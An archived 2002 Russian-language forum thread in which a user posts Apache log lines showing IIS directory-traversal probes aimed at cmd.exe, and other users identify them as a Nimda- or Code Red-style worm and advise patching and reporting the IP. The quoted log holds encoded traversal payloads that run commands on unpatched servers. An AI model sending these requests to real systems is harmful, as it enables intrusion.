Kamrad.ru

Kamrad.ru (https://kamrad.ru/index.php)
-   Программы (software) (https://kamrad.ru/forumdisplay.php?f=11)
-   -   Меня пытаются взломать? (https://kamrad.ru/showthread.php?t=31399)

bloodmeri 05-05-2002 01:10
Меня пытаются взломать?
 
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
___________________________________________________


это кусок log файла от апачи сервера.
по моему это не должно так выглядеть.

посоветуйте б что енто такое

референт 05-05-2002 02:55
Обычная отака с использованием известных дыр.Вовремя ставить заплатки.И послать письмо с этими логами провайдеру в чьем ведении этот IP.Хотя ничего серьезного в этом нет.Пусть на халяву проверяют уязвимости сервера.

bloodmeri 05-05-2002 07:24
спасибо.
а то я сомневался в том что ето атака.
письмо уже послал.
пошел ставить заплатки

Moonshade 06-05-2002 01:22
Это похоже на Нимду или Редкод. Пашет только на непатченных IIS.

bloodmeri 06-05-2002 12:00
похоже что какая-то программа , потому что ломится целыми днями.
по IP можно как нибудь свяэатся с ним ?
netmeeting , ICQ , winpopup ?
потому как он может и не знает что от него кто - то ломится ?


All times are GMT +3. The time now is 06:31.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
Любое использование материалов сайта
возможно только с разрешения его администрации.